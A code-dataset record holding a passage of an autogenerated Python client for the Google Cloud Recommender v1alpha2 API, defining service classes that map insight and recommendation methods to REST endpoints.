hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0d657714f1da72b892970452db4e789cb53b2101
| 91,204
|
py
|
Python
|
lib/googlecloudsdk/third_party/apis/recommender/v1alpha2/recommender_v1alpha2_client.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 2
|
2019-11-10T09:17:07.000Z
|
2019-12-18T13:44:08.000Z
|
lib/googlecloudsdk/third_party/apis/recommender/v1alpha2/recommender_v1alpha2_client.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | null | null | null |
lib/googlecloudsdk/third_party/apis/recommender/v1alpha2/recommender_v1alpha2_client.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 1
|
2020-07-25T01:40:19.000Z
|
2020-07-25T01:40:19.000Z
|
"""Generated client library for recommender version v1alpha2."""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.recommender.v1alpha2 import recommender_v1alpha2_messages as messages
class RecommenderV1alpha2(base_api.BaseApiClient):
"""Generated client library for service recommender version v1alpha2."""
MESSAGES_MODULE = messages
BASE_URL = 'https://recommender.googleapis.com/'
MTLS_BASE_URL = 'https://recommender.mtls.googleapis.com/'
_PACKAGE = 'recommender'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
_VERSION = 'v1alpha2'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'RecommenderV1alpha2'
_URL_VERSION = 'v1alpha2'
_API_KEY = None
def __init__(self, url='', credentials=None,
             get_credentials=True, http=None, model=None,
             log_request=False, log_response=False,
             credentials_args=None, default_global_params=None,
             additional_http_headers=None, response_encoding=None):
  """Create a new recommender handle.

  All arguments are forwarded to base_api.BaseApiClient; when no
  explicit url is supplied, the class-level BASE_URL is used.
  """
  super(RecommenderV1alpha2, self).__init__(
      url or self.BASE_URL, credentials=credentials,
      get_credentials=get_credentials, http=http, model=model,
      log_request=log_request, log_response=log_response,
      credentials_args=credentials_args,
      default_global_params=default_global_params,
      additional_http_headers=additional_http_headers,
      response_encoding=response_encoding)
  # One service stub per API resource collection, grouped by root resource.
  self.billingAccounts_locations_insightTypes_insights = self.BillingAccountsLocationsInsightTypesInsightsService(self)
  self.billingAccounts_locations_insightTypes = self.BillingAccountsLocationsInsightTypesService(self)
  self.billingAccounts_locations_recommenders_recommendations = self.BillingAccountsLocationsRecommendersRecommendationsService(self)
  self.billingAccounts_locations_recommenders = self.BillingAccountsLocationsRecommendersService(self)
  self.billingAccounts_locations = self.BillingAccountsLocationsService(self)
  self.billingAccounts = self.BillingAccountsService(self)
  self.folders_locations_insightTypes_insights = self.FoldersLocationsInsightTypesInsightsService(self)
  self.folders_locations_insightTypes = self.FoldersLocationsInsightTypesService(self)
  self.folders_locations_recommenders_recommendations = self.FoldersLocationsRecommendersRecommendationsService(self)
  self.folders_locations_recommenders = self.FoldersLocationsRecommendersService(self)
  self.folders_locations = self.FoldersLocationsService(self)
  self.folders = self.FoldersService(self)
  self.organizations_locations_insightTypes_insights = self.OrganizationsLocationsInsightTypesInsightsService(self)
  self.organizations_locations_insightTypes = self.OrganizationsLocationsInsightTypesService(self)
  self.organizations_locations_recommenders_recommendations = self.OrganizationsLocationsRecommendersRecommendationsService(self)
  self.organizations_locations_recommenders = self.OrganizationsLocationsRecommendersService(self)
  self.organizations_locations = self.OrganizationsLocationsService(self)
  self.organizations = self.OrganizationsService(self)
  self.projects_locations_insightTypes_insights = self.ProjectsLocationsInsightTypesInsightsService(self)
  self.projects_locations_insightTypes = self.ProjectsLocationsInsightTypesService(self)
  self.projects_locations_recommenders_config = self.ProjectsLocationsRecommendersConfigService(self)
  self.projects_locations_recommenders_recommendations = self.ProjectsLocationsRecommendersRecommendationsService(self)
  self.projects_locations_recommenders = self.ProjectsLocationsRecommendersService(self)
  self.projects_locations = self.ProjectsLocationsService(self)
  self.projects = self.ProjectsService(self)
class BillingAccountsLocationsInsightTypesInsightsService(base_api.BaseApiService):
  """Service class for the billingAccounts_locations_insightTypes_insights resource."""

  _NAME = 'billingAccounts_locations_insightTypes_insights'

  def __init__(self, client):
    super(RecommenderV1alpha2.BillingAccountsLocationsInsightTypesInsightsService, self).__init__(client)
    # No media-upload methods on this resource.
    self._upload_configs = {}

  def Get(self, request, global_params=None):
    r"""Gets the requested insight. Requires the recommender.*.get IAM permission for the specified insight type.

    Args:
      request: (RecommenderBillingAccountsLocationsInsightTypesInsightsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Insight) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}',
      http_method='GET',
      method_id='recommender.billingAccounts.locations.insightTypes.insights.get',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}',
      request_field='',
      request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsGetRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Insight',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    r"""Lists insights for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified insight type.

    Args:
      request: (RecommenderBillingAccountsLocationsInsightTypesInsightsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2ListInsightsResponse) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights',
      http_method='GET',
      method_id='recommender.billingAccounts.locations.insightTypes.insights.list',
      ordered_params=['parent'],
      path_params=['parent'],
      query_params=['filter', 'pageSize', 'pageToken'],
      relative_path='v1alpha2/{+parent}/insights',
      request_field='',
      request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsListRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2ListInsightsResponse',
      supports_download=False,
  )

  def MarkAccepted(self, request, global_params=None):
    r"""Marks the Insight State as Accepted. Users can use this method to indicate to the Recommender API that they have applied some action based on the insight. This stops the insight content from being updated. MarkInsightAccepted can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight.

    Args:
      request: (RecommenderBillingAccountsLocationsInsightTypesInsightsMarkAcceptedRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Insight) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('MarkAccepted'), request,
        global_params=global_params)

  MarkAccepted.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markAccepted',
      http_method='POST',
      method_id='recommender.billingAccounts.locations.insightTypes.insights.markAccepted',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}:markAccepted',
      request_field='googleCloudRecommenderV1alpha2MarkInsightAcceptedRequest',
      request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsMarkAcceptedRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Insight',
      supports_download=False,
  )

  def MarkActive(self, request, global_params=None):
    r"""Mark the Insight State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED insight has to be marked back as ACTIVE. MarkInsightActive can be applied to insights in DISMISSED state. Requires the recommender.*.update IAM permission for the specified insight type.

    Args:
      request: (RecommenderBillingAccountsLocationsInsightTypesInsightsMarkActiveRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Insight) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('MarkActive'), request,
        global_params=global_params)

  MarkActive.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markActive',
      http_method='POST',
      method_id='recommender.billingAccounts.locations.insightTypes.insights.markActive',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}:markActive',
      request_field='googleCloudRecommenderV1alpha2MarkInsightActiveRequest',
      request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsMarkActiveRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Insight',
      supports_download=False,
  )

  def MarkDismissed(self, request, global_params=None):
    r"""Mark the Insight State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE insight should be dismissed. MarkInsightDismissed can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight type.

    Args:
      request: (RecommenderBillingAccountsLocationsInsightTypesInsightsMarkDismissedRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Insight) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('MarkDismissed'), request,
        global_params=global_params)

  MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markDismissed',
      http_method='POST',
      method_id='recommender.billingAccounts.locations.insightTypes.insights.markDismissed',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}:markDismissed',
      request_field='googleCloudRecommenderV1alpha2MarkInsightDismissedRequest',
      request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsMarkDismissedRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Insight',
      supports_download=False,
  )
class BillingAccountsLocationsInsightTypesService(base_api.BaseApiService):
  """Service class for the billingAccounts_locations_insightTypes resource."""

  _NAME = 'billingAccounts_locations_insightTypes'

  def __init__(self, client):
    super(RecommenderV1alpha2.BillingAccountsLocationsInsightTypesService, self).__init__(client)
    # This resource exposes no API methods of its own and no media uploads.
    self._upload_configs = {}
class BillingAccountsLocationsRecommendersRecommendationsService(base_api.BaseApiService):
  """Service class for the billingAccounts_locations_recommenders_recommendations resource."""

  _NAME = 'billingAccounts_locations_recommenders_recommendations'

  def __init__(self, client):
    super(RecommenderV1alpha2.BillingAccountsLocationsRecommendersRecommendationsService, self).__init__(client)
    # No media-upload methods on this resource.
    self._upload_configs = {}

  def Get(self, request, global_params=None):
    r"""Gets the requested recommendation. Requires the recommender.*.get IAM permission for the specified recommender.

    Args:
      request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}',
      http_method='GET',
      method_id='recommender.billingAccounts.locations.recommenders.recommendations.get',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}',
      request_field='',
      request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsGetRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    r"""Lists recommendations for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified recommender.

    Args:
      request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2ListRecommendationsResponse) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations',
      http_method='GET',
      method_id='recommender.billingAccounts.locations.recommenders.recommendations.list',
      ordered_params=['parent'],
      path_params=['parent'],
      query_params=['filter', 'pageSize', 'pageToken'],
      relative_path='v1alpha2/{+parent}/recommendations',
      request_field='',
      request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsListRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2ListRecommendationsResponse',
      supports_download=False,
  )

  def MarkActive(self, request, global_params=None):
    r"""Mark the Recommendation State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED recommendation has to be marked back as ACTIVE. MarkRecommendationActive can be applied to recommendations in DISMISSED state. Requires the recommender.*.update IAM permission for the specified recommender.

    Args:
      request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkActiveRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('MarkActive'), request,
        global_params=global_params)

  MarkActive.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markActive',
      http_method='POST',
      method_id='recommender.billingAccounts.locations.recommenders.recommendations.markActive',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}:markActive',
      request_field='googleCloudRecommenderV1alpha2MarkRecommendationActiveRequest',
      request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkActiveRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
      supports_download=False,
  )

  def MarkClaimed(self, request, global_params=None):
    r"""Marks the Recommendation State as Claimed. Users can use this method to indicate to the Recommender API that they are starting to apply the recommendation themselves. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationClaimed can be applied to recommendations in CLAIMED or ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.

    Args:
      request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkClaimedRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('MarkClaimed'), request,
        global_params=global_params)

  MarkClaimed.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markClaimed',
      http_method='POST',
      method_id='recommender.billingAccounts.locations.recommenders.recommendations.markClaimed',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}:markClaimed',
      request_field='googleCloudRecommenderV1alpha2MarkRecommendationClaimedRequest',
      request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkClaimedRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
      supports_download=False,
  )

  def MarkDismissed(self, request, global_params=None):
    r"""Mark the Recommendation State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE recommendation has to be marked back as DISMISSED. MarkRecommendationDismissed can be applied to recommendations in ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.

    Args:
      request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkDismissedRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('MarkDismissed'), request,
        global_params=global_params)

  MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markDismissed',
      http_method='POST',
      method_id='recommender.billingAccounts.locations.recommenders.recommendations.markDismissed',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}:markDismissed',
      request_field='googleCloudRecommenderV1alpha2MarkRecommendationDismissedRequest',
      request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkDismissedRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
      supports_download=False,
  )

  def MarkFailed(self, request, global_params=None):
    r"""Marks the Recommendation State as Failed. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation failed. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationFailed can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.

    Args:
      request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkFailedRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('MarkFailed'), request,
        global_params=global_params)

  MarkFailed.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markFailed',
      http_method='POST',
      method_id='recommender.billingAccounts.locations.recommenders.recommendations.markFailed',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}:markFailed',
      request_field='googleCloudRecommenderV1alpha2MarkRecommendationFailedRequest',
      request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkFailedRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
      supports_download=False,
  )

  def MarkSucceeded(self, request, global_params=None):
    r"""Marks the Recommendation State as Succeeded. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation was successful. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationSucceeded can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.

    Args:
      request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkSucceededRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('MarkSucceeded'), request,
        global_params=global_params)

  MarkSucceeded.method_config = lambda: base_api.ApiMethodInfo(
      flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markSucceeded',
      http_method='POST',
      method_id='recommender.billingAccounts.locations.recommenders.recommendations.markSucceeded',
      ordered_params=['name'],
      path_params=['name'],
      query_params=[],
      relative_path='v1alpha2/{+name}:markSucceeded',
      request_field='googleCloudRecommenderV1alpha2MarkRecommendationSucceededRequest',
      request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkSucceededRequest',
      response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
      supports_download=False,
  )
class BillingAccountsLocationsRecommendersService(base_api.BaseApiService):
  """Service class for the billingAccounts_locations_recommenders resource."""

  _NAME = 'billingAccounts_locations_recommenders'

  def __init__(self, client):
    super(RecommenderV1alpha2.BillingAccountsLocationsRecommendersService, self).__init__(client)
    # This resource exposes no API methods of its own and no media uploads.
    self._upload_configs = {}
class BillingAccountsLocationsService(base_api.BaseApiService):
  """Service class for the billingAccounts_locations resource."""

  _NAME = 'billingAccounts_locations'

  def __init__(self, client):
    super(RecommenderV1alpha2.BillingAccountsLocationsService, self).__init__(client)
    # This resource exposes no API methods of its own and no media uploads.
    self._upload_configs = {}
class BillingAccountsService(base_api.BaseApiService):
  """Service class for the billingAccounts resource."""

  _NAME = 'billingAccounts'

  def __init__(self, client):
    super(RecommenderV1alpha2.BillingAccountsService, self).__init__(client)
    # This resource exposes no API methods of its own and no media uploads.
    self._upload_configs = {}
class FoldersLocationsInsightTypesInsightsService(base_api.BaseApiService):
"""Service class for the folders_locations_insightTypes_insights resource."""
_NAME = 'folders_locations_insightTypes_insights'
def __init__(self, client):
  """Bind this service stub to *client* via the apitools base class."""
  super(RecommenderV1alpha2.FoldersLocationsInsightTypesInsightsService, self).__init__(client)
  # No media-upload methods on this resource.
  self._upload_configs = {}
def Get(self, request, global_params=None):
  r"""Gets the requested insight. Requires the recommender.*.get IAM permission for the specified insight type.

  Args:
    request: (RecommenderFoldersLocationsInsightTypesInsightsGetRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (GoogleCloudRecommenderV1alpha2Insight) The response message.
  """
  return self._RunMethod(
      self.GetMethodConfig('Get'), request,
      global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}',
    http_method='GET',
    method_id='recommender.folders.locations.insightTypes.insights.get',
    ordered_params=['name'],
    path_params=['name'],
    query_params=[],
    relative_path='v1alpha2/{+name}',
    request_field='',
    request_type_name='RecommenderFoldersLocationsInsightTypesInsightsGetRequest',
    response_type_name='GoogleCloudRecommenderV1alpha2Insight',
    supports_download=False,
)
def List(self, request, global_params=None):
  r"""Lists insights for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified insight type.

  Args:
    request: (RecommenderFoldersLocationsInsightTypesInsightsListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (GoogleCloudRecommenderV1alpha2ListInsightsResponse) The response message.
  """
  return self._RunMethod(
      self.GetMethodConfig('List'), request,
      global_params=global_params)

List.method_config = lambda: base_api.ApiMethodInfo(
    flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights',
    http_method='GET',
    method_id='recommender.folders.locations.insightTypes.insights.list',
    ordered_params=['parent'],
    path_params=['parent'],
    query_params=['filter', 'pageSize', 'pageToken'],
    relative_path='v1alpha2/{+parent}/insights',
    request_field='',
    request_type_name='RecommenderFoldersLocationsInsightTypesInsightsListRequest',
    response_type_name='GoogleCloudRecommenderV1alpha2ListInsightsResponse',
    supports_download=False,
)
def MarkAccepted(self, request, global_params=None):
  r"""Marks the Insight State as Accepted. Users can use this method to indicate to the Recommender API that they have applied some action based on the insight. This stops the insight content from being updated. MarkInsightAccepted can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight.

  Args:
    request: (RecommenderFoldersLocationsInsightTypesInsightsMarkAcceptedRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (GoogleCloudRecommenderV1alpha2Insight) The response message.
  """
  return self._RunMethod(
      self.GetMethodConfig('MarkAccepted'), request,
      global_params=global_params)

MarkAccepted.method_config = lambda: base_api.ApiMethodInfo(
    flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markAccepted',
    http_method='POST',
    method_id='recommender.folders.locations.insightTypes.insights.markAccepted',
    ordered_params=['name'],
    path_params=['name'],
    query_params=[],
    relative_path='v1alpha2/{+name}:markAccepted',
    request_field='googleCloudRecommenderV1alpha2MarkInsightAcceptedRequest',
    request_type_name='RecommenderFoldersLocationsInsightTypesInsightsMarkAcceptedRequest',
    response_type_name='GoogleCloudRecommenderV1alpha2Insight',
    supports_download=False,
)
def MarkActive(self, request, global_params=None):
    r"""Mark the Insight State as Active.

    Use this to tell the Recommender API that a DISMISSED insight should be
    marked back as ACTIVE. Applicable to insights in DISMISSED state. Requires
    the recommender.*.update IAM permission for the specified insight type.

    Args:
      request: (RecommenderFoldersLocationsInsightTypesInsightsMarkActiveRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Insight) The response message.
    """
    method_config = self.GetMethodConfig('MarkActive')
    return self._RunMethod(method_config, request, global_params=global_params)

# HTTP wiring for MarkActive: POST to the insight's :markActive verb.
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
    http_method='POST',
    method_id='recommender.folders.locations.insightTypes.insights.markActive',
    flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markActive',
    relative_path='v1alpha2/{+name}:markActive',
    ordered_params=['name'],
    path_params=['name'],
    query_params=[],
    request_field='googleCloudRecommenderV1alpha2MarkInsightActiveRequest',
